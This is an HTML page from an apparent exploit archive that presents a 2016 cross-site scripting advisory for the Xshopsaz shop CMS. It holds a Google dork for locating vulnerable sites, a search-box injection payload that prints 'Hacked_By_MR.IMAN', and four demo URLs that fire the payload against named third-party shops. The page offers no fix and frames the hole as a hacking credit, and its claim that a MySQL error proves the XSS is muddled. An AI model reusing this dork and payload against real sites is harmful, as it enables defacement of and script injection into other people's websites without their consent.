<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-37</title>
    </head>
    <body>
        <center>
                <a  href="exploit-37" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
###########################

# Xshopsaz CMS Cross Site Scripting Vulnerability

###########################

* Title : Xshopsaz CMS Cross Site Scripting Vulnerability
* date : 5/7/2016
* Google Dork : intext:&quot;قدرت اين سايت در استفاده از فروشگاه ساز ميکس ايران است&quot; inurl:id=
* Exploit Author : Guardiran Security Team
* Website : guardiran.org
* Vendor HomePage : http://www.xshopsaz.ir/
* Version : All Version
* Tested On : Kali Linux w3af / Windows 8.1 Mozila FireFox

Hello Guys.
This Is A Xss Vulnerability.
In This CMS We Can Run SCript  In SearchBox.
In This CMS When We Run Scripts Give Me A MYsql Error . In This Mean That This CMS Is vulnerable .
Page vulnerable : [ Search Box ]
Payload : &quot;&gt;&lt;marquee&gt;&lt;h1&gt;Hacked_By_MR.IMAN&lt;/h1&gt;&lt;/marquee&gt;

Demo :

http://takhfifdooni.com/search.php?match=any&amp;pshort=Y&amp;pfull=Y&amp;pname=Y&amp;s=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.IMAN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;cat=0&amp;I1.x=6&amp;I1.y=6
http://powermc.net/search.php?match=any&amp;pshort=Y&amp;pfull=Y&amp;pname=Y&amp;s=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.IMAN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;cat=0&amp;I1.x=6&amp;I1.y=11
http://kalaqom.ir/search.php?s=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.IMAN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;cat=0&amp;I1.x=14&amp;I1.y=21&amp;match=any&amp;pshort=Y&amp;pfull=Y&amp;pname=Y
http://www.harfineh.ir/search.php?match=any&amp;pshort=Y&amp;pfull=Y&amp;pname=Y&amp;s=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.IMAN%3C%2Fh1%3E%3C%2Fmarquee%3E&amp;cat=0&amp;I1.x=7&amp;I1.y=11


* Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker
* Discovered By : MR.IMAN ~~ demon.hacker37@yahoo.com ~~ telegram.me/MRBLACK
* We Are Guardiran Security Team        </pre>
    </body>
</html>